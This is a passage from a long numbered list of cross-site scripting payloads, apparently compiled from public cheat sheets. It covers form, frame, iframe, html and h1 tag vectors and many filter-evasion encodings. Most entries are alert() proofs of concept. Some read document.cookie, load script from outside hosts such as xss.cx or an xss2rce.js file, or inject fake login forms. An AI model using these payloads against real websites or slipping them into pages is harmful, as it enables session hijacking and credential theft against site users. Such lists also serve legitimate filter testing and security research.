  2083. <form><button formaction=”javascript:alert(73)%%0D3C! — 
  2084. <form><button formaction=”javascript:alert(XSS)”>lol
  2085. <form><button formaction=javascript&colon;alert(1)>CLICKME
  2086. <form><button formaction=javascript&colon;alert(1)>CLICKME
  2087. <Form> <button formaction = javascript & colon; alert (1)> CLICKME
  2088. <form><button formaction=javascript&colon;alert(1)>M
  2089. <form><button formaction=javascript&colon;confirm(1)>CLICKME
  2090. <form><button formaction=”javascript:javascript:alert(1)”>X
  2091. form = document.createElement(‘form’);
  2092. <form formaction=popup=1; onclick=popup=1;><object>
  2093. <form href=’x’onclick=popup=1;><select>
  2094. form.id = ‘form_xss’;
  2095. <form id=”myform” value=”” action=javascript&Tab;:eval(document.getElementById(‘myform’).elements[0].value)><textarea>confirm(1)</textarea><input type=”submit” value=”Absenden”></form>
  2096. <form id=”test” /><button form=”test” formaction=”javascript:alert(123)”>TESTHTML5FORMACTION
  2097. <form id=”test” /><button form=”test” formaction=”javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))”>X
  2098. <form id=”test” /><button form=”test” formaction=”javascript:javascript:alert(1)”>X
  2099. <form id=”test”></form><button form=”test” formaction=”javascript:alert(1)”>X</button>
  2100. <form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
  2101. <form><iframe &#09;&#10;&#11; src=”javascript&#58;alert(1)”&#11;&#10;&#09;;>
  2102. <form><iframe &#09;&#10;&#11; src=”javascript&#58;confirm(1)”&#11;&#10;&#09;;>
  2103. <form><iframe src=”javascript:alert(1)” ;>
  2104. <form><input formaction=javascript:alert(168) type=submit value=click>
  2105. <form><input formaction=javascript:alert(169) type=image value=click>
  2106. <form><input formaction=javascript:alert(170) type=image src=SOURCE>
  2107. <form><input formaction=javascript:alert(1) type=image src=http://brutelogic.com.br/webgun/img/youtube1.jpg>
  2108. <form><input formaction=javascript:alert(1) type=image src=SOURCE>
  2109. <form><input formaction=javascript:alert(1) type=image src=SOURCE>
  2110. <form><input formaction=javascript:alert(1) type=image value=click>
  2111. <form><input formaction=javascript:alert(1) type=image value=click>
  2112. <form><input formaction=javascript:alert(1) type=submit value=click>
  2113. <form><input formaction=javascript:alert(1) type=submit value=click>
  2114. ?</form><input type=”date” onfocus=”alert(1)”>
  2115. <form><input type=”image” value=”submit” formaction=//goo.gl/nlX0P>
  2116. <form><input type=submit formaction=//xss.cx><textarea name=x>
  2117. <form><isindex formaction=”javascript&colon;confirm(1)”
  2118. <form><isindex formaction=”java&Tab;s&NewLine&cript&colon;confirm(1)”>
  2119. form.method=’POST’;
  2120. <form method=post action=”//brutelogic.com.br/tests/comments.php”
  2121. <form method=post onclick=elements[0].value=outerHTML;submit()>
  2122. <form name=location >
  2123. <form oninput=alert(1)></input></form>
  2124. <form oninput=”alert(1)”><input type=”range”
  2125. <form onsubmit=alert(105)><input type=submit>
  2126. <form onsubmit=alert(1)><input type=submit>
  2127. <form onsubmit=alert(23)><button>M
  2128. form.target = ‘frame_xss’;
  2129. <form><textarea &#13; onkeyup=’\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;’>
  2130. <form><textarea onkeyup=’\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;’>
  2131. for(n in{constructor:0})[][?=n][?](/alert(1)/.source)()
  2132. for([]o\u{66}!\u{61}\u{6c}\u{65}\u{72}\u{74}`1`)\u{66}
  2133. For([]o\u{66}!\u{61}\u{6c}\u{65}\u{72}\u{74}`1`)\u{66}
  2134. fo.setAttribute(action, profile.php?id=100);
  2135. fo.setAttribute(method, post);
  2136. fo.setAttribute(target, myFrame);
  2137. fo.submit();
  2138. four=”{{set(‘insert’,me.root.ownerbody.appendChild)}}”
  2139. frame = document.createElement(‘iframe’);
  2140. frame.name=’frame_xss’;
  2141. <FRAMESET><FRAME id=XSS SRC=”javascript:alert(‘XSS’);”></FRAMESET>
  2142. <FRAMESET><FRAME id=XSS SRC=\”javascript:alert(‘XSS’);\”></FRAMESET>
  2143. <FRAMESET><FRAME RC=””+”javascript:confirm(5);”></FRAMESET>
  2144. <FRAMESET><FRAME SRC=”javascript:alert(1);”></FRAMESET>
  2145. <FRAMESET><FRAME src=javascript:alert(‘XpSS’)></FRAME></FRAMESET>
  2146. <FRAMESET><FRAME SRC=javascript:alert(‘XSS’)></FRAME></FRAMESET>
  2147. <;FRAMESET>;<;FRAME SRC=”;javascript:alert(‘;XSS’;);”;>;<;/FRAMESET>;
  2148. <FRAMESET><FRAME ?SRC=”javascript:alert(‘XSS’) ?;”></FRAMESET>
  2149. <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
  2150. <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
  2151. <FRAMESET><FRAME SRC=\”javascript:alert(‘XSS’);\”></FRAMESET>
  2152. <FRAMESET><FRAME SRC=”javascript:confirm(5);”></FRAMESET>
  2153. <FRAMESET><FRAME SRC=”javascript:document.vulnerable=true;”></frameset>
  2154. <FRAMESET><FRAME SRC=”javascript:javascript:alert(1);”></FRAMESET>
  2155. <frameset><frame src onload=alert(1)>
  2156. <frameset><frame/src=//xss.cx>
  2157. <frameset><frame src=”xss”></frameset>
  2158. <frameset id=”x”onload=popup=1;>
  2159. <frameset onBlur frameset onBlur=”javascript:javascript:alert(1)”></frameset onBlur>
  2160. <frameset onFocus frameset onFocus=”javascript:javascript:alert(1)”></frameset onFocus>
  2161. <frameset onload=alert(1)>
  2162. <frameset onload=alert(123)>
  2163. <frameset onload=javascript:alert(1)>
  2164. <frameset onload=javascript:javascript:alert(1)></frameset>
  2165. <frameset onload=popup=1;>
  2166. <frameset onpageshow=”alert(1)”>
  2167. <frameset/onpageshow=alert(1)>
  2168. <frameset onScroll frameset onScroll=”javascript:javascript:alert(1)”></frameset onScroll>
  2169. frame.style=’visibility: hidden;’;
  2170. fr = document.createElement(iframe);
  2171. fr.setAttribute(name, myFrame);
  2172. fr.setAttribute(style, display:none);
  2173. f.setAttribute(style,display:none);
  2174. f.src=//+targets[i]+/PATH/PAGE?PARAM=<script src=//DOMAIN/xss2rce.js>;
  2175. \);function%20someFunction(a){}prompt(1)//
  2176. Function(‘a=`${alert`’,’`}`){‘)()
  2177. Function(‘a=alert``’,’’)()
  2178. (function(a){alert(1)}).call()
  2179. (function({a,b,c}={a:1,b:2,c:3}){alert(`${a},${b},${c}`)})()
  2180. Function(‘a=[class A extends Function(‘,’}]){alert(1)’)()
  2181. Function(‘){alert()//’, ‘’)();
  2182. function() {alert(1)}
  2183. function() {alert(1
  2184. Function`$${`a${`l${`e${`r${`t${`(${`1${`)`}`}`}`}`}`}`}`}$```
  2185. Function`alert(1)```````````
  2186. Function(“ale”+”rt(1)”)();
  2187. Function{}(‘alert(1)’)``
  2188. (function(){alert(9)})()
  2189. Function(“a=`”,”`,xss=1){alert(xss)”)()
  2190. functionBody = “with($context){with($data||{}){return{“ +rewrittenBindings + “}}}”;
  2191. function(){code}
  2192. (function{}).constructor
  2193. function document::onreadystatechange(){alert(1);}
  2194. (function { eval(‘var a=1’); }); alert(typeof a);
  2195. function filter($value) {return preg_replace($this->_expressions, ‘’, $value);
  2196. function::[‘location’]=’javascript’’:alert(/FF/)’
  2197. !function(lol=alert(1)){}()
  2198. Function.prototype.toString=Function.prototype.call;”alert(1)//”.replace(“//”,Function)
  2199. Function(‘x=alert`1`’,’y’)()
  2200. function xss(why,){}//
  2201. f=(x=alert(1))=>{}; f();
  2202. f=(x=alert(1))=>{};f();
  2203. +g,a=C[A]+C[+!A],A]+a])() [g[A]+g[A+A]+C[E]+a](A)
  2204. Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,’window’)(),’document’)(), ‘getElementsByTagName’)(‘html’)[0],’innerHTML’)().match(/d.*’/));</script>
  2205. gbk chatset:%bb\”alert(1)
  2206. Generic Source Breaking
  2207. $.get(‘//0’,function(r){write(r)})>
  2208. $.getScript(‘//0’)
  2209. ?getURL,javascript:alert(1)”,
  2210. ?getURL(javascript:alert(1))”,
  2211. #getURL,javascript:alert(1)”,
  2212. getURL(“javascript:alert(‘X9SS’)”)
  2213. getURL(“javascript:alert(‘XSS’)”)
  2214. getURL(“javascript:confirm(document.location)”)
  2215. ?getURLValue=javascript:alert(1)”,
  2216. GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
  2217. g’”></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250
  2218. <g onload=��javascript:alert(9)��></g></svg>
  2219. Google Chrome Auditor Bypass (up to v51)
  2220. ?goto=javascript:alert(1)”,
  2221. ?goto,javascript:alert(1)”,
  2222. #goto,javascript:alert(1)”,
  2223. &gt;
  2224. &gt
  2225. &GT;
  2226. &GT
  2227. <h1><font color=”#00FF00">Ege was here :)</font></h1>
  2228. <h1><font color=blue>hellox worldss</h1>
  2229. <h1>Hello,<script>alert(1)</script>!</h1>
  2230. <h1>Hello, <script>alert(1)</script>!</h1>
  2231. “><h1><IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>”>123</h1>
  2232. “><h1><IFRAME SRC=# onmouseover=”alert(document.cookie)”></IFRAME>123</h1>
  2233. ><h1><IFRAME width=”420" height=”315" frameborder=”0" onmouseover=”document.location.href=’https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr
  2234. “><h1><iframe width=”420" height=”315" src=”http://www.youtube.com/embed/sxvccpasgTE" frameborder=”0" allowfullscreen></iframe>123</h1>
  2235. “><h1><IFRAME width=”420" height=”315" SRC=”http://www.youtube.com/embed/sxvccpasgTE" frameborder=”0" onmouseover=”alert(document.cookie)”></IFRAME>123</h1>
  2236. <h1>INJECTX</h1>
  2237. <h1><marquee><b><u><i>XSS</i></u></b></marquee></h1>
  2238. <h1 _-_-_-ng_-_-_click=”$event.view.location.replace(‘javascript:alert(1)’)”>XSS</h1>
  2239. <h1/onclick=alert(1)>a//INJECTX
  2240. ><h1/onclick=a\u006cer\u0074(/Xss-By-Muhaddi/)>Click Me</h1>
  2241. ��><h1/onclick=a\u006cer\u0074(/Xss-By-Muhaddi/)>Click Me</h1>
  2242. ><h1/onclick=a\u006cer\u0074(/xss-by-shawar/)>clickme</h1>
  2243. “><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>
  2244. “><h1 onclick=prompt(1)>Clickme</h1>
  2245. “><h1/ondrag=co\u006efir\u006d`1`)>DragMe</h1>
  2246. <h1 onerror=alert(/@0x6D6172696F/)>XSS</h1><style>*:after{content:url()}</style>
  2247. <h1/onmouseover=’alert(1)’>renwa
  2248. <h1/onmouseover=’alert(1)’>Renwa
  2249. ><h1 onmouseover=alert(Xss-By-Muhaddi)>Hover Me</h1>
  2250. ><h1 onmouseover=alert(Xss)>Hover Me</h1>
  2251. ��><h1 onmouseover=alert(��Xss��)>Hover Me</h1>
  2252. “><h1/onmouseover=’\u0061lert(1)’>
  2253. [‘<h1>Payload</h1>’,’<script>alert(/HOLA/);</script>’]
  2254. “><h2 id=”Iamheading”onmouseover=”confirm(1)”>
  2255. <handler id=”y”>alert(1)</handler>
  2256. <handler xmlns:ev=”http://www.w3.org/2001/xml-events" ev:event=”load”>alert(1)</handler>
  2257. <head><base href=”javascript://”></head><body><a href=”/. /,alert(1)//#”>XXX</a></body>
  2258. <head><base href=”javascript://”/></head><body><a href=”/. /,alert(1)//#”>XXX</a></body>
  2259. <head><base href=”javascript://”></head><body><a href=”/. /,javascript:alert(1)//#”>XXX</a></body>
  2260. head -c 1000000 /dev/urandom
  2261. head -c 1000000 /dev/urandom > /tmp/bin.bin
  2262. header(‘Refresh: 0;url=javascript:alert(1)’);
  2263. header(‘Refresh: 0;url=javascript:confirm(1)’);
  2264. <;HEAD>;<;META HTTP-EQUIV=”;CONTENT-TYPE”; CONTENT=”;text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(‘;XSS’;);+ADw-/SCRIPT+AD4-
  2265. <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"></HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
  2266. <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
  2267. <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
  2268. <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-confirm(5);+ADw-/SCRIPT+AD4-
  2269. <head><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
  2270. <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
  2271. <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD><SCRIPT>alert(‘XSS’);</SCRIPT>
  2272. Hello @Html.Raw(MyValue)
  2273. Hello <%= MyValue =>
  2274. <! — Hello — world > <SCRIPT>confirm(1)</SCRIPT> →
  2275. href=[0x0b]” onclick=alert(1)//
  2276. href= action= formaction= location= on*= name= background= poster= src= code= data=
  2277. href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4g>
  2278. href=”data:text/html&comma;&lt;script&gt;alert(document.domain)&lt
  2279. href=javascript:alert(1)
  2280. “ href=javascript:alert(1)
  2281. href=javascript:alert(1)//>Click</a>
  2282. “ href=javascript:alert(1) <math><!V
  2283. href=vjavascript:alert(1)//v>Click</a>
  2284. </html>
  2285. </HTML>
  2286. <;HTML>;<;BODY>;
  2287. <HTML><BODY>
  2288. <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”>
  2289. <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;”></BODY></HTML>
  2290. <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;”></BODY></HTML>
  2291. <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;”></BODY></HTML><HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>alert(“XSS”)</SCRIPT>”></BODY></HTML>
  2292. <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>alert(‘XSS’)</SCRIPT>”> </BODY></HTML>
  2293. <html><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>”></BODY></html>
  2294. <html data-toggle=tab href=”<img src=k onerror=alert(66)>”>
  2295. <html><noalert><noscript>(123)</noscript><script>(123)</script>
  2296. <html><noalert><noscript>(XSS)</noscript><script>(XSS)</script>
  2297. <html onMouseDown html onMouseDown=”javascript:javascript:alert(1)”></html onMouseDown>
  2298. <html onMouseEnter html onMouseEnter=”javascript:parent.javascript:alert(1)”></html onMouseEnter>
  2299. <html onMouseLeave html onMouseLeave=”javascript:javascript:alert(1)”></html onMouseLeave>
  2300. <html onmousemove html onmousemove=”javascript:javascript:alert(1)”></html onmousemove>
  2301. <html onMouseMove html onMouseMove=”javascript:javascript:alert(1)”></html onMouseMove>
  2302. <html onMouseOut html onMouseOut=”javascript:javascript:alert(1)”></html onMouseOut>
  2303. <Html Onmouseover=(alert)(1) //
  2304. <html onmouseover html onmouseover=”javascript:javascript:alert(1)”></html onmouseover>
  2305. <html onMouseOver html onMouseOver=”javascript:javascript:alert(1)”></html onMouseOver>
  2306. <html onMouseUp html onMouseUp=”javascript:javascript:alert(1)”></html onMouseUp>
  2307. <html onMouseWheel html onMouseWheel=”javascript:javascript:alert(1)”></html onMouseWheel>
  2308. <html ontouchcancel=alert(1)>
  2309. <html ontouchend=alert(1)>
  2310. <html ontouchend=alert(1)>
  2311. <html ontouchmove=alert(1)>
  2312. <html ontouchmove=alert(1)>
  2313. <html ontouchstart=alert(1)>
  2314. <html ontouchstart=alert(1)>
  2315. <html:script>javascript:alert(1);</html:script></html:html>
  2316. </html></script> // XML inside JS
  2317. htmlspecialchars($_REQUEST[q], ENT_QUOTES);
  2318. htmlStr = ‘<a href=”’+*dataentities*+’javascript:123">test</a>’; document.getElementById(‘placeholder’).innerHTML = htmlStr; try { if(document.getElementById(‘placeholder’).firstChild.protocol === ‘javascript:’) { customLog(*dataentities*); } }catch(e){};
  2319. htmlStr = ‘<a href=”javascript’+*dataentities*+’:123">test</a>’; document.getElementById(‘placeholder’).innerHTML = htmlStr; try { if(document.getElementById(‘placeholder’).firstChild.protocol === ‘javascript:’) { customLog(*dataentities*); } }catch(e){};
  2320. htmlStr = ‘<a href=”javascript’+*dataentities*+’123">test</a>’; document.getElementById(‘placeholder’).innerHTML = htmlStr; try { if(document.getElementById(‘placeholder’).firstChild.protocol === ‘javascript:’) { customLog(*dataentities*); } }catch(e){};
  2321. <html><title>{alert(‘xss’)}</title></html>
  2322. <;HTML xmlns:xss>;
  2323. <HTML xmlns:xss>
  2324. <HTML xmlns:xss><?import namespace=”xss” implementation=”%(htc)s”>
  2325. <HTML xmlns:xss><?import namespace=”xss” implementation=”%(htc)s”><xss:xss>XSS</xss:xss></HTML>”””,”XML namespace.”),(“””<XML ID=”xss”><I><B>&lt;IMG SRC=”javas<! — →cript:javascript:alert(1)”&gt;</B></I></XML><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
  2326. <HTML xmlns:xss><?import namespace=”xss” implementation=”http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
  2327. <HTML xmlns:xss><?import namespace=”xss” implementation=”http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss</html>
  2328. <HTML xmlns:xss><?import namespace=”xss” implementation=”http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
  2329. );HTP.PRINT(:1); — 
  2330. );HTP.PRINT(:1); — =pwned<svg/onload=prompt(‘XSS\u0020via\u0020sql\u0020injection’)>
  2331. “h”+”t”+”t”+”p”,
  2332. “h”+”t”+”t”+”p”A
  2333. http://a/%%30%30
  2334. http://aa<script>alert(123)</script>
  2335. http://aa'><script>alert(123)</script>
  2336. http://aa"><script>alert(123)</script>
  2337. @brutelogic.com.br/webgun/test.php?p=”>http://alert(1)@brutelogic.com.br/webgun/test.php?p=<svg+onload=eval(URL.slice(7,15))>
  2338. http://brutelogic.com.br/webgun/test.php?p=<brute id=test onmouseover=alert(1)>AAAA
  2339. http://brutelogic.com.br/webgun/test.php?p=<brute onmouseover=pop(1)>AAAA
  2340. http://brutelogic.com.br/webgun/test.php?p=<script src=//3334957647/1>
  2341. http://domain/page?p=%26p=%26lt;svg/onload=alert(1)%3E%3Cj%20onclick=location%2B=document.body.textContent%3Eclick%20me![BODY_CONTENT]&p=<svg/onload=alert(1)>click me!
  2342. http://domain/page?p=%26p=%26lt;svg/onload=alert(1)><j%20onclick=location%2B=document.body.textContent>click%20me![BODY_CONTENT]&p=<svg/onload=alert(1)>click me!
  2343. http://domain/page?p=%3Cj%20onclick=location%2B=textContent%3E%26p=%26lt;svg/onload=alert(1)%3E&p=<svg/onload=alert(1)>
  2344. http://domain/page?p=%3Cj%26p=%3Csvg%2Bonload=alert(1)%20onclick=location%2B=outerHTML%3Eclick%20me!<j&p=<svg+onload=alert(1) onclick=location+=outerHTML>
  2345. http://DOMAIN/PAGE.php/"><svg onload=alert(1)>
  2346. http://domain/page?p=<j%20onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>&p=<svg/onload=alert(1)>
  2347. http://domain/page?p=<j%26p=<svg%2Bonload=alert(1)%20onclick=location%2B=outerHTML>click%20me!<j&p=<svg+onload=alert(1) onclick=”location+=outerHTML”>
  2348. http://domain/page?p=<script/src=//3237054390/1+
  2349. http://domain/page?p=<svg/onload=alert(1)>
  2350. http://domain/page?p=<svg/onload=alert(1)+
  2351. http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD
  2352. @brutelogic.com.br/webgun/test.php?p=”>http://javascript:alert(1)@brutelogic.com.br/webgun/test.php?p=<svg+onload=location=URL.slice(7,26)>
  2353. <http://onxxx%3D1/
  2354. <http://onxxx%3D151/
  2355. http://...?p=<script/src=//brutelogic.com.br/1+
  2356. http://...?p=<svg/onload=alert(1)+
  2357. http(s)://host/page?p=XSS
  2358. http://target.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)
  2359. http://target.com/something.xxx?a=val1&a=val2
  2360. http://window.open (“http://tpc.googlesyndication.com/safeframe/1-0- K”,”1;25;<svg/onload=alert(/XSS/)>true”)
  2361. http://www.google<script .com>alert(document.location)</script
  2362. http://www.google<script .com>confirm(document.location)</script
  2363. http://www.<script abc>setTimeout(‘confirm(1)’,1)</script .com>
  2364. http://www.<script>alert(1)</script .com
  2365. http://www.<script>confirm(1)</script .com
  2366. http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??
  2367. http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??
  2368. http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=><img src=x onerror=prompt(0);>
  2369. http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=v><img src=x onerror=prompt(0);>
  2370. http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS
  2371. HYPERLINK TAG INJECTION:
  2372. (i=0;i<100;)
  2373. @i\6d\70o\72\74'javascr\ipt:alert(document.cookie)’;
  2374. i = document.createElement(input);
  2375. id=XSS SRC=<IMG 6;avascript:alert(‘XSS’)>
  2376. id=xss style=overflow:scroll>
  2377. if(1)confirm(1)}{
  2378. if(/*@cc_on!@*/0==1){alert(1);}else{alert(2);}</script>
  2379. <;! — [if gte IE 4]>;
  2380. <! — [if gte IE 4]>
  2381. <! — [if gte IE 4]><SCRIPT>alert(‘XSS’);</SCRIPT><![endif] →
  2382. <! — [if gte IE 4]> <SCRIPT>alert(‘XSS’);</SCRIPT> <![endif] →
  2383. <! — [if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif] →
  2384. <! — [if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif] →
  2385. <! — [if IE]><img src=# width=0 height=0 onerror=alert(/insight-labs/)><![endif] →
  2386. <! — [if IE]><img src=# width=0 height=0 onerror=alert(/ourren_demo/)><![endif] →
  2387. <![if<iframe
  2388. <![if<iframe/onload=alert(1)//]>
  2389. <![if<iframe/onload=vbs::alert[:]>
  2390. <! — [if<img src=x onerror=alert(2)//]> →
  2391. <! — [if<img src=x onerror=javascript:alert(1)//]> →
  2392. <! — [if<img src=x:x onerror=confirm(5)//] →
  2393. <ifra<ifame>me>…</ifra</iframe>me>
  2394. <iframe/%00/ src=javaSCRIPT&colon;alert(1)
  2395. <iframe/%00/ src=javaSCRIPT&colon;confirm(1)
  2396. <iframe %00 src=”&Tab;javascript:prompt(1)&Tab;”%00>
  2397. <iframe%0Aname=”javascript:\u0061\u006C\u0065\u0072\u0074(1)”
  2398. <iframe%0Aname=”javascript:\u0061\u006C\u0065\u0072\u0074(1)” %0Aonload=”eval(name)”;>
  2399. “><iframe%20src=”http://google.com"%%203E
  2400. <IFRAME%20src=’javascript:confirm%26%23x25;281)’>
  2401. iframe.contentWindow.location.constructor.prototype
  2402. </iframe><form method=post action=LOGIN_URL>
  2403. <iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById(‘ifra’); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, ‘Safe’, {value:{}}); foo(Safe, ‘get’, {value:function() { return document.cookie }}); alert(Safe.get());</script>
  2404. <iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById(‘ifra’); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, ‘Safe’, {value:{}}); foo(Safe, ‘get’, {value:function() { return document.cookie }}); alert(Safe.get());</script>
  2405. <iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById(‘ifra’); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, ‘Safe’, {value:{}}); foo(Safe, ‘get’, {value:function() { return document.cookie }}); confirm(Safe.get());</script>
  2406. <iframe id=t:alert(1) name=javascrip onload=location=name%2bid>
  2407. <iframe id=XSS / /onload=alert(/XSS/)></iframe>
  2408. <iframe id=XSS / “onload=alert(/XSS/)></iframe>
  2409. <iframe id=XSS “onload=alert(/XSS/)></iframe>
  2410. <iframe id=XSS///////onload=alert(/XSS/)></iframe>
  2411. <iframe id=XSS <?php echo chr(11)?> onload=alert(/XSS/)></iframe>
  2412. <iframe id=XSS <?php echo chr(12)?> onload=alert(/XSS/)></iframe>
  2413. <IFRAME id=XSS SRC=”javascript:alert(‘XSS’); <
  2414. <IFRAME id=XSS SRC=”javascript:alert(‘XSS’);”></IFRAME>
  2415. <iframe><iframe src=javascript:alert(/@jackmasa/)></iframe>
  2416. <iframe><iframe src=javascript:confirm(4)></iframe>
  2417. <IFRAME name=”F1" src=”http://target/#<SCRIPT>var secret=’1232';”></IFRAME>
  2418. <IFRAME name=”F2" src=”http://target/#<SCRIPT>var secret=’1233';”></IFRAME>
  2419. <IFRAME name=”F3" src=”http://target/#<SCRIPT>var secret=’1234';”></IFRAME>
  2420. <iframe/name=”if(0){\u0061lert(1)}else{\u0061lert(1)}”/onload=”eval(name)”;>
  2421. <iframe name=javascript:alert(1) src=http://www.target.com/?xss=<svg/onload=location=name//>
  2422. <iframe/name=”javascript:confirm(1);”onload=”while(1){eval(name);}”>
  2423. <iframe ng-src=javascript:..>
  2424. <iframe onbeforeload iframe onbeforeload=”javascript:javascript:alert(1)”></iframe onbeforeload>
  2425. <iframe onload=%22write(‘<script>’%2Blocation.hash.substr(1)%2B’</script>’)%22></iframe>#var xhr = new XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
  2426. <iframe onload=%22write(‘<script>’%2Blocation.hash.substr(1)%2B’</script>’)%22></iframe>#var xhr = new XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
  2427. “><iframe/onload=alert(1)>
  2428. <iframe onload=”alert(1)”></iframe>
  2429. <iframe/onload=alert(document.domain)></iframe>
  2430. <iframe/onload=alert(/INJECTX/)>
  2431. <iframe onload iframe onload=”javascript:javascript:alert(1)”></iframe onload>
  2432. <iframe onLoad iframe onLoad=”javascript:javascript:alert(1)”></iframe onLoad>
  2433. <iframe onload=popup=1;>
  2434. <iframe/onload=’this[“src”]=”javas&Tab;cript:al”+”ert``”’;>
  2435. <iframe/onload=’this[“src”]=”javas&Tab;cript:al”+”ert``”’;
  2436. <iframe/onreadystatechange=alert(1)
  2437. <iframe/onreadystatechange=confirm(1)
  2438. “><iframe/onreadystatechange=confirm(1)
  2439. <iframe onReadyStateChange iframe onReadyStateChange=”javascript:javascript:alert(1)”></iframe onReadyStateChange>
  2440. <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074(‘\u0061’) worksinIE>
  2441. <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074(‘\u006worksinIE>
  2442. <iframe<?php echo chr(11)?> onload=alert(‘XSS’)></iframe>
  2443. <iframe<?php echo chr(11)?> onload=alert(‘XSS’)></iframe>
  2444. “></iframe><script>alert(123)</script>
  2445. “></iframe><script>alert(123)</script>
  2446. “></iframe><script>alert(document.cookie);</script>
  2447. “></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder=”0%EF%BB%BF
  2448. <iframesrc=&#039;http://www.target.com?foo="xss autofocus/AAAAA
  2449. <iframesrc=&#039;http://www.target.com?foo="xss autofocus/AAAAA onfocus=location=window.name//&#039;
  2450. <iframe/src=%&#050f&#x2fben.mario#%0Anew%20alert%20`3`;width=1 height=1 style=visibility:hidden;/>
